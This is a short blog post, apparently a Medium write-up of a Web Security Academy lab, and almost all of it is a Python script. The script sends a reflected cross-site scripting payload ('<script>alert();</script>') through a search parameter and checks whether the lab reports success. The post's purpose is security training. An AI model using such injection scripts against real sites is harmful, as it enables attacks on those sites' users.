Cross Site Scripting (XSS) - Lab 01

#!/usr/bin/env python3import requestsimport urllib3import sysurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {"http" : "http://127.0.0.1:8080","https" : "http://127.0.0.1:8080"}cookies = {"session" : "sTpIlyI9fJ1VmZadmxaqWyUa941wRxkS"}#payload = sys.argv[2]payload = '<script>alert();</script>'# url = sys.argv[1]url = "https://0afc00e90379e4c4c02d8eec00140003.web-security-academy.net/?search="r = requests.get(url+payload, cookies=cookies, verify=False)r = requests.get(url, cookies=cookies, verify=False)if "Congratulations" in r.text:print("[+] XSS Successfull!")

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
HotPlugin

HotPlugin

Software Engineer into Reverse Engineering and Other things